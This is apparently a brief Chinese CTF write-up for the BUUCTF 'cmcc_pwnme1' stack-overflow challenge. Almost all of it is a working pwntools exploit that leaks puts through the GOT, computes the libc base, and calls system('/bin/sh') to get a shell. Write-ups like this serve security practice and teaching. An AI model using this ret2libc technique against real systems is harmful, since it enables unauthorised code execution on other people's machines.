BUU-cmcc_pwnme1-WP
完成任务很开心。栈溢出水题,没什么可说的,直接exp吧
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh = remote("node3.buuoj.cn",29136)
elf = ELF("./pwnme1")
libc = ELF("./libcs/buu-32-libc.so")
pop_ebp_ret = 0x80485f3
payload = 'a' * 0xA4 + 'b' * 0x4 + p32(elf.symbols["puts"]) + p32(pop_ebp_ret) + p32(elf.got["puts"])
payload += p32(0x8048570)
sh.sendlineafter("Exit \n",'5')
sh.sendlineafter("fruit:",payload)
sh.recvuntil("..\n")
puts_addr = u32(sh.recv(4))
base = puts_addr - libc.symbols["puts"]
print hex(base)
payload = 'a' * 0xA4 + 'b' * 0x4 + p32(base + libc.symbols["system"]) + 'a' * 4 + p32(base + libc.search("/bin/sh").next())
sh.sendlineafter("Exit \n",'5')
sh.sendlineafter("fruit:",payload)
sh.interactive()
题目给了后门,但是buu上后门没法用,所以就老老实实leak吧。